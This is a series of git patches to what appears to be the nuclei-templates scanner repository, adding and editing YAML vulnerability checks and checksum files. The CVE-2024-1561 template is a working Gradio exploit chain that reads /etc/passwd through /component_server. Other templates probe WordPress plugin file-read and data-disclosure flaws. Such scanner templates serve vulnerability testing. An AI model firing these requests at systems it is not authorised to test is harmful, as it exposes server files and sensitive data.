1 insertion(+), 1 deletion(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 3e821e1d56..97d338b8eb 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3755,4 +3755,4 @@ http: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4b0a00483046022100c8bddb53fa936be9b6fbc7fd66feb697d5d52aca31e1c86cba815603d6f36b780221008d13bd9355885cd5ce520d970de1599c5380197d0da9109d264f45e61fdc58d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afa60b596fe20299d482f935df87359f0c8fb824c709cb56ef1f08634909a2000220316c27df890a1e6cb71ae4fe147ccd2465493542520ed705054c5a8df06cc1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 69f65998544d0af1309534bba1963ce1ec1a1dfa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 17:54:42 +0530 Subject: [PATCH 271/375] minor update --- http/exposed-panels/tiny-rss-panel.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 7d226d6904..460457f73e 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -22,7 +22,6 @@ http: matchers: - type: dsl dsl: - - 'status_code==200 && contains(tolower(body), "Tiny Tiny RSS")' - - 'status_code==200 && contains(tolower(body), "ttrss_login")' - - 'status_code==200 && contains(tolower(body), "ttrss_utility")' + - 'status_code==200' + - 'contains_all(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' condition: and From d7a19ee52a18f93e085cba62432b2e118c4cd3fa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 18:07:52 +0530 Subject: [PATCH 272/375] minor update --- http/cves/2023/CVE-2023-5991.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 88a964407e..1f67bfe17d 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -6,6 +6,7 @@ info: severity: critical description: | The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server + remediation: Fixed in 4.8.5 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/ @@ -15,13 +16,16 @@ info: cve-id: CVE-2023-5991 cwe-id: CWE-22 epss-score: 0.00603 - epss-percentile: 0.78406 + epss-percentile: 0.78412 cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: motopress product: hotel_booking_lite framework: wordpress - tags: cve,cve2023,lfi,hbl,hotel + publicwww-query: "/wp-content/plugins/motopress-hotel-booking" + tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp http: - method: GET @@ -31,6 +35,7 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" From 5ce723d9824ec5f0d05d0bc2e1b18d6c86b7ce85 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 22:31:40 +0530 Subject: [PATCH 273/375] Create CVE-2024-1561.yaml --- http/cves/2024/CVE-2024-1561.yaml | 82 +++++++++++++++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1561.yaml diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml new file mode 100644 index 0000000000..89b984cf12 --- /dev/null +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -0,0 +1,82 @@ +id: CVE-2024-1561 + +info: + name: Gradio Applications - Unauthorized Local File Read + author: Diablo + severity: high + description: | + Local file read by calling arbitrary methods of Components class + impact: | + Successful exploitation of this vulnerability could allow an attacker to read files on the server + remediation: | + Update to Gradio 4.13.0 + reference: + - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338 + - https://github.com/DiabloHTB/CVE-2024-1561 + - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561 + - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-1561 + cwe-id: CWE-29 + epss-score: 0.00045 + epss-percentile: 0.14639 + metadata: + verified: true + max-request: 3 + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,intrusive,unauth,gradio,lfi + +flow: http(1) && http(2) && http(3) + +http: + - raw: + - | + GET /config HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: first-component + part: body + group: 1 + json: + - '.components[0].id' + internal: true + + - raw: + - | + POST /component_server HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"component_id": "{{first-component}}", + "data": "/etc/passwd", + "fn_name": "move_resource_to_block_cache", + "session_hash": "aaaaaaaaaaa"} + + extractors: + - type: regex + name: tmpath + regex: + - "/(?P<hash>[a-fA-F0-9]+)/" + internal: true + + - raw: + - | + GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0:" + + - type: word + part: header + words: + - "text/plain" From 29db5710b6758e2e38a752188e7bd4b493b8d9a2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 22:35:12 +0530 Subject: [PATCH 274/375] fix trail space --- http/cves/2024/CVE-2024-1561.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 89b984cf12..0ff2b8859f 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -47,7 +47,7 @@ http: internal: true - raw: - - | + - | POST /component_server HTTP/1.1 Host: {{Hostname}} Content-Type: application/json @@ -60,7 +60,7 @@ http: extractors: - type: regex name: tmpath - regex: + regex: - "/(?P<hash>[a-fA-F0-9]+)/" internal: true From 3a99b64d6ac1eeca5447a83543d3de7d83c23499 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 01:12:14 +0530 Subject: [PATCH 275/375] minor update --- http/cves/2024/CVE-2024-1561.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 0ff2b8859f..6f4697e481 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -60,13 +60,13 @@ http: extractors: - type: regex name: tmpath - regex: - - "/(?P<hash>[a-fA-F0-9]+)/" + regex: + - \/[a-zA-Z0-9\/]+ internal: true - raw: - | - GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1 + GET /file={{tmpath}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and From 76488cade30fe73b73df0833a63d86d866d9222a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 01:16:04 +0530 Subject: [PATCH 276/375] fix trail space --- http/cves/2024/CVE-2024-1561.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 6f4697e481..1fe5e8dc1f 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -60,7 +60,7 @@ http: extractors: - type: regex name: tmpath - regex: + regex: - \/[a-zA-Z0-9\/]+ internal: true From 89a07bbb42e52bce1906c94cac88658848bf76de Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 01:30:29 +0530 Subject: [PATCH 277/375] Create CVE-2024-3097.yaml --- http/cves/2024/CVE-2024-3097.yaml | 50 +++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3097.yaml diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml new file mode 100644 index 0000000000..d8356d638a --- /dev/null +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -0,0 +1,50 @@ +id: CVE-2024-3097 + +info: + name: NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure + author: DhiyanesDK + severity: medium + description: | + The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin. + reference: + - https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/REST/Admin/Block.php#L40 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/75f87f99-9f0d-46c2-a6f1-3c1ea0176303?source=cve + - https://zpbrent.github.io/pocs/8-plugin-nextgen-gallery-InfoDis-20240327.mp4 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-3097 + cwe-id: CWE-862 + epss-score: 0.00052 + epss-percentile: 0.19521 + cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:* + metadata: + vendor: imagely + product: nextgen_gallery + framework: wordpress + publicwww-query: "/wp-content/plugins/nextgen-gallery/" + tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak + +http: + - method: GET + path: + - "{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"success":' + - '"image":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 From 6d093ed2160196ccf437400f30b5b29fb697ef0c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 02:27:52 +0530 Subject: [PATCH 278/375] Create froxlor-installer.yaml --- .../installer/froxlor-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/froxlor-installer.yaml diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml new file mode 100644 index 0000000000..4bee3970e4 --- /dev/null +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -0,0 +1,31 @@ +id: froxlor-installer + +info: + name: Froxlor Server Management - Installer + author: DhiyaneshDK + severity: high + description: | + Detects the Froxlor Server Management Panel installation page. + reference: + - https://www.exploit-db.com/ghdb/8397 + metadata: + verified: true + max-request: 1 + fofa-query: title="Froxlor Server Management Panel - Installation" + tags: misconfig,froxlor,installer,setup + +http: + - method: GET + path: + - "{{BaseURL}}/install/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>Froxlor Server Management Panel - Installation" + + - type: status + status: + - 200 From 23ca54c9b138c78d3f418d1ab08a15fcd6a46399 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 15 May 2024 02:39:46 +0530 Subject: [PATCH 279/375] Create custom-xoops-installer.yaml --- .../installer/custom-xoops-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/custom-xoops-installer.yaml diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml new file mode 100644 index 0000000000..6af3ad2175 --- /dev/null +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -0,0 +1,31 @@ +id: custom-xoops-installer + +info: + name: XOOPS Custom Installer - Exposed + author: DhiyaneshDK + severity: high + description: | + Detects the presence of XOOPS Custom installation page. + reference: + - https://www.exploit-db.com/ghdb/1115 + metadata: + verified: true + max-request: 1 + fofa-query: title="XOOPS Custom Installation" + tags: misconfig,xoops,installer,setup + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "XOOPS Custom Installation" + + - type: status + status: + - 200 From d7b685edbc321ca0b3a3c7076fbcf4bf069a4d20 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:52:32 +0300 Subject: [PATCH 280/375] Update gocd-unauth-dashboard.yaml --- http/misconfiguration/gocd/gocd-unauth-dashboard.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 41aa0dee99..7bf379bbc8 100644 --- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -7,7 +7,7 @@ info: description: GoCd Dashboard is exposed. metadata: max-request: 1 - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" tags: go,gocd,unauth,misconfig http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022039ea9bdb750a12ccc3a1ed4f126dc46e57f112649d35b2ed182a654a048ea4ad022100d4c117105dea72d50f8721c3c173dc0dd54cac8ffa896fd7f2ef5b4525f1f90a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039ea9bdb750a12ccc3a1ed4f126dc46e57f112649d35b2ed182a654a048ea4ad022100d4c117105dea72d50f8721c3c173dc0dd54cac8ffa896fd7f2ef5b4525f1f90a:922c64590222798bb761d5b6d8e72950 From 9ea72310a045c243714b080bc3a59f2df50345cb Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:53:18 +0300 Subject: [PATCH 281/375] Update gocd-encryption-key.yaml --- http/misconfiguration/gocd/gocd-encryption-key.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index c8868e7ca9..93ae128e3e 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 metadata: max-request: 1 - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" tags: go,gocd,exposure,misconfig http: @@ -38,4 +38,4 @@ http: - type: regex regex: - "([a-z0-9]){32}" -# digest: 490a0046304402205ac41f33e34d969b020ee864720a58cdc98c17066213906ca0a6703759bee6260220648ad5ffaa33adc1a318395cd2da424417fb64cf1ed962a0bb6da6cf73514c09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ac41f33e34d969b020ee864720a58cdc98c17066213906ca0a6703759bee6260220648ad5ffaa33adc1a318395cd2da424417fb64cf1ed962a0bb6da6cf73514c09:922c64590222798bb761d5b6d8e72950 From 1d6a95a7bc91a36d53a95ff2e683348f7eb8fe30 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:54:20 +0300 Subject: [PATCH 282/375] Update gocd-cruise-configuration.yaml --- http/misconfiguration/gocd/gocd-cruise-configuration.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index 8e72c43c6b..cf581b6731 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 metadata: max-request: 1 - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" tags: go,gocd,config,exposure,misconfig http: @@ -31,4 +31,4 @@ http: - "webhookSecret" - "tokenGenerationKey" condition: and -# digest: 4a0a0047304502200d2fd1e9ecc4854d8aa9b0188c42e1c8a4dab6cf811a1c1b0ddefca324d1de1c02210084d971bcf96b13508ede2ea3a0c92d437bdfc34c2d22d5ea4437328690cec9e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d2fd1e9ecc4854d8aa9b0188c42e1c8a4dab6cf811a1c1b0ddefca324d1de1c02210084d971bcf96b13508ede2ea3a0c92d437bdfc34c2d22d5ea4437328690cec9e1:922c64590222798bb761d5b6d8e72950 From 642c7a372a2584d1640473993c0bb872a8858d86 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:55:09 +0300 Subject: [PATCH 283/375] Update CVE-2021-43287.yaml --- http/cves/2021/CVE-2021-43287.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 91d85419f6..e8a9f41d78 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thoughtworks product: gocd - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" tags: cve2021,cve,go,lfi,gocd,thoughtworks http: @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204609e2e1895643baf7cdc7ad60281688e3476109ccc5ce2ccb2cf0270ebfbfc5022019685f6fa856fe84479cc12e3f1f631a79582a35c1f30fb624a042c867cad5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204609e2e1895643baf7cdc7ad60281688e3476109ccc5ce2ccb2cf0270ebfbfc5022019685f6fa856fe84479cc12e3f1f631a79582a35c1f30fb624a042c867cad5c7:922c64590222798bb761d5b6d8e72950 From 8ce47f6e11dae574f388d1d84b92271295f1798d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 23:56:54 +0000 Subject: [PATCH 284/375] Auto Generated Templates Checksum [Tue May 14 23:56:54 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9511a8a3df..3a67f42efa 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5333,7 +5333,7 @@ http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc http/misconfiguration/gocd/gocd-cruise-configuration.yaml:5d6cff182941ab13f63a9670759c38e35bf48200 -http/misconfiguration/gocd/gocd-encryption-key.yaml:a74d049cb9d02c3ab676794fcb6eb8905b175dd7 +http/misconfiguration/gocd/gocd-encryption-key.yaml:b5515851c8e9d9819cbf17b6d7eb42437a00ebc6 http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:5511df1524242c7128bd033238a4dae5db3fb86a http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f http/misconfiguration/gopher-server.yaml:049ecafed940f9efdec3f7ea458fb6f516e22238 @@ -6704,7 +6704,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:7af0d4305d97f9d1f8869a72e244d64936f8ab86 +http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8526,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:542b55550827998f7eb58bd6f32a8987dfe28dc1 +templates-checksum.txt:443a567bd8b88ffc4284def78c3dc2e03374c457 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 165101ae4138644e9c12db34839e606055382cf5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 23:57:31 +0000 Subject: [PATCH 287/375] Auto Generated Templates Checksum [Tue May 14 23:57:31 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3a67f42efa..ccd528e555 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2349,7 +2349,7 @@ http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 http/cves/2021/CVE-2021-42887.yaml:dfe8d47da07a7c37b5294acdd283c4c27dbdf753 http/cves/2021/CVE-2021-43062.yaml:a2a6ba5ec2ce275fa2ffbb6b19af1b20dfc0a0c3 -http/cves/2021/CVE-2021-43287.yaml:86f5633bd3e4a0df1cdc3cf229d5f6c94da694d8 +http/cves/2021/CVE-2021-43287.yaml:86d4216d1418d3ee400ea98a2aa9ff407d4c7db0 http/cves/2021/CVE-2021-43421.yaml:d3b512996e80ab08eaec03df406c88aa78376ac9 http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 http/cves/2021/CVE-2021-43496.yaml:1241385fad2c3dee60c598304d8dc5b177d94c32 @@ -5332,7 +5332,7 @@ http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a5 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc -http/misconfiguration/gocd/gocd-cruise-configuration.yaml:5d6cff182941ab13f63a9670759c38e35bf48200 +http/misconfiguration/gocd/gocd-cruise-configuration.yaml:36a522bd05c12da13079058f75e0d272007728a5 http/misconfiguration/gocd/gocd-encryption-key.yaml:b5515851c8e9d9819cbf17b6d7eb42437a00ebc6 http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:5511df1524242c7128bd033238a4dae5db3fb86a http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f @@ -8526,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:443a567bd8b88ffc4284def78c3dc2e03374c457 +templates-checksum.txt:fde380a18fd424d1fb883d41dda45c0b95784e5c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d794820170a6c1abfe211d8086926eb5b12ecc92 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 23:58:33 +0000 Subject: [PATCH 289/375] Auto Template Signing [Tue May 14 23:58:33 UTC 2024] :robot: --- http/misconfiguration/gocd/gocd-encryption-key.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index 93ae128e3e..928da55e05 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -38,4 +38,4 @@ http: - type: regex regex: - "([a-z0-9]){32}" -# digest: 490a0046304402205ac41f33e34d969b020ee864720a58cdc98c17066213906ca0a6703759bee6260220648ad5ffaa33adc1a318395cd2da424417fb64cf1ed962a0bb6da6cf73514c09:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 09565244cc13da8249c7bf3f13967ead3a15194e Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:59:51 +0300 Subject: [PATCH 290/375] Update kiwitcms-login.yaml --- http/exposed-panels/kiwitcms-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/kiwitcms-login.yaml b/http/exposed-panels/kiwitcms-login.yaml index acc185fa66..6f1a03b92d 100644 --- a/http/exposed-panels/kiwitcms-login.yaml +++ b/http/exposed-panels/kiwitcms-login.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 product: kiwi_tcms - shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 + shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 vendor: kiwitcms tags: kiwitcms,panel @@ -33,4 +33,4 @@ http: group: 1 regex: - "Version ([0-9.]+)" -# digest: 4a0a0047304502204970f122554d53140cadb0128e08750a33a2fa84fc89d097f5af68e1bfb2eb16022100cd6eb7291e86d5379a54e26a5c5d3abcd4ff5c0f505858a409d2b4da17d521f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204970f122554d53140cadb0128e08750a33a2fa84fc89d097f5af68e1bfb2eb16022100cd6eb7291e86d5379a54e26a5c5d3abcd4ff5c0f505858a409d2b4da17d521f7:922c64590222798bb761d5b6d8e72950 From 21f3397ebf41c267ffc7c0dc9ecf15d03a377396 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 00:00:27 +0000 Subject: [PATCH 292/375] Auto Generated Templates Checksum [Wed May 15 00:00:27 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ccd528e555..6c374011ea 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3981,7 +3981,7 @@ http/exposed-panels/kfm/kaes-file-manager.yaml:163a84373e69e74099b9f771341054ad2 http/exposed-panels/kfm/kfm-login-panel.yaml:d86163cf22c63d250566759202ef64092196705f http/exposed-panels/kibana-panel.yaml:ab4bffa526cbad54f4b8abf2bc46f5ddc1e4a284 http/exposed-panels/kiteworks-pcn-panel.yaml:8eb88c7a52943afd620e5f92e0f12ea4b2fdef16 -http/exposed-panels/kiwitcms-login.yaml:4f2a08cf85319ee93b172cf3e09da11eaa08d097 +http/exposed-panels/kiwitcms-login.yaml:12c42952a2be760b44850a50bf8f8e571a20d610 http/exposed-panels/kkfileview-panel.yaml:c42a91ee90824170f94bcaaf4a396e33f8d1420b http/exposed-panels/klr300n-panel.yaml:3e7feed65269887a82bdab5a4971d4748236fdcd http/exposed-panels/kodak-network-panel.yaml:ff5ef39f196e3dcec90c1df4f05cee3b70ffa854 @@ -5333,8 +5333,8 @@ http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d 